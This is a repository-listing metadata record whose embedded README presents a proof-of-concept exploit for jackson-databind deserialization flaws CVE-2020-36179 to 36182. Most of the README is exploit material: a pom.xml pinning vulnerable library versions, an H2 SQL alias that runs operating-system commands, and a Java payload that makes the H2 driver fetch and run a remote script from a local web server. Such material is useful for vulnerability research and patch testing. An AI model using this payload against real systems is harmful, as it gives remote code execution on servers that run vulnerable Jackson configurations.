{"id":13844545,"url":"https://github.com/Al1ex/CVE-2020-36179","last_synced_at":"2025-07-11T23:33:44.223Z","repository":{"id":108707262,"uuid":"328321384","full_name":"Al1ex/CVE-2020-36179","owner":"Al1ex","description":"CVE-2020-36179~82  Jackson-databind SSRF\u0026RCE","archived":false,"fork":false,"pushed_at":"2021-01-10T06:48:53.000Z","size":181,"stargazers_count":79,"open_issues_count":0,"forks_count":9,"subscribers_count":3,"default_branch":"main","last_synced_at":"2024-08-05T17:42:22.568Z","etag":null,"topics":["cve-2020-36179","jackson-databind","rce","ssrf"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Al1ex.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2021-01-10T06:47:49.000Z","updated_at":"2024-04-01T15:17:38.000Z","dependencies_parsed_at":"2023-03-22T18:09:45.131Z","dependency_job_id":null,"html_url":"https://github.com/Al1ex/CVE-2020-36179","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Al1ex%2FCVE-2020-36179","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Al1ex%2FCVE-2020-36179/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Al1ex%2FCVE-2020-36179/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Al1ex%2FCVE-2020-36179/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Al1ex","download_url":"https://codeload.github.com/Al1ex/CVE-2020-36179/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225772638,"owners_count":17521868,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cve-2020-36179","jackson-databind","rce","ssrf"],"created_at":"2024-08-04T17:02:44.823Z","updated_at":"2024-11-21T17:30:21.209Z","avatar_url":"https://github.com/Al1ex.png","language":null,"funding_links":[],"categories":["Others"],"sub_categories":[],"readme":"## Description\r\nCVE-2020-36179：\r\nFasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS.\r\n\r\nCVE-2020-36180：\r\nFasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS.\r\n\r\nCVE-2020-36181：\r\nFasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS.\r\n\r\nCVE-2020-36182：\r\nFasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS.\r\n\r\n## How to RCE\r\nBecause the above four CVE security vulnerabilities are triggered in a similar way, here we only take CVE-2020-36180 as an example:\r\n\r\npom.xml\r\n```\r\n\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\r\n\u003cproject xmlns=\"http://maven.apache.org/POM/4.0.0\"\r\n         xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\r\n         xsi:schemaLocation=\"http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd\"\u003e\r\n    \u003cmodelVersion\u003e4.0.0\u003c/modelVersion\u003e\r\n\r\n    \u003cgroupId\u003ecom.jacksonTest\u003c/groupId\u003e\r\n    \u003cartifactId\u003ejacksonTest\u003c/artifactId\u003e\r\n    \u003cversion\u003e1.0-SNAPSHOT\u003c/version\u003e\r\n    \u003cdependencies\u003e\r\n        \u003cdependency\u003e\r\n            \u003cgroupId\u003ecom.fasterxml.jackson.core\u003c/groupId\u003e\r\n            \u003cartifactId\u003ejackson-databind\u003c/artifactId\u003e\r\n            \u003cversion\u003e2.9.10.7\u003c/version\u003e\r\n        \u003c/dependency\u003e\r\n        \u003c!-- https://mvnrepository.com/artifact/org.apache.commons/commons-dbcp2 --\u003e\r\n        \u003cdependency\u003e\r\n            \u003cgroupId\u003eorg.apache.commons\u003c/groupId\u003e\r\n            \u003cartifactId\u003ecommons-dbcp2\u003c/artifactId\u003e\r\n            \u003cversion\u003e2.8.0\u003c/version\u003e\r\n        \u003c/dependency\u003e\r\n        \u003c!-- https://mvnrepository.com/artifact/com.h2database/h2 --\u003e\r\n        \u003cdependency\u003e\r\n            \u003cgroupId\u003ecom.h2database\u003c/groupId\u003e\r\n            \u003cartifactId\u003eh2\u003c/artifactId\u003e\r\n            \u003cversion\u003e1.4.199\u003c/version\u003e\r\n        \u003c/dependency\u003e\r\n\r\n        \u003cdependency\u003e\r\n            \u003cgroupId\u003eorg.slf4j\u003c/groupId\u003e\r\n            \u003cartifactId\u003eslf4j-nop\u003c/artifactId\u003e\r\n            \u003cversion\u003e1.7.2\u003c/version\u003e\r\n        \u003c/dependency\u003e\r\n        \u003c!-- https://mvnrepository.com/artifact/javax.transaction/jta --\u003e\r\n        \u003cdependency\u003e\r\n            \u003cgroupId\u003ejavax.transaction\u003c/groupId\u003e\r\n            \u003cartifactId\u003ejta\u003c/artifactId\u003e\r\n            \u003cversion\u003e1.1\u003c/version\u003e\r\n        \u003c/dependency\u003e\r\n    \u003c/dependencies\u003e\r\n\u003c/project\u003e\r\n```\r\n\r\nexec.sql:\r\n```\r\nCREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {\r\n        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter(\"\\\\A\");\r\n        return s.hasNext() ? s.next() : \"\";  }\r\n$$;\r\nCALL SHELLEXEC('calc.exe')\r\n```\r\n\r\npoc.java\r\n```\r\nimport com.fasterxml.jackson.databind.ObjectMapper;\r\nimport com.fasterxml.jackson.databind.SerializationFeature;\r\n\r\n\r\npublic class POC {\r\n    public static void main(String[] args) throws Exception {\r\n        String payload = \"[\\\"org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS\\\",{\\\"url\\\":\\\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://127.0.0.1:3333/exec.sql'\\\"}]\";\r\n        ObjectMapper mapper = new ObjectMapper();\r\n        mapper.enableDefaultTyping();\r\n        mapper.configure(SerializationFeature.FAIL_ON_EMPTY_BEANS, false);\r\n        Object obj = mapper.readValue(payload, Object.class);\r\n        mapper.writeValueAsString(obj);\r\n    }\r\n}\r\n```\r\n\r\nresult:\r\n\r\n![result](img/result.jpg)\r\n\r\nGadget:\r\n\r\n```\r\nDriverAdapterCPDS\r\n    -\u003eseturl\r\n        -\u003egetPooledConnection\r\n            -\u003eDirverManager.getConnection(this.url,username,pass)\r\n```\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FAl1ex%2FCVE-2020-36179","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FAl1ex%2FCVE-2020-36179","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FAl1ex%2FCVE-2020-36179/lists"}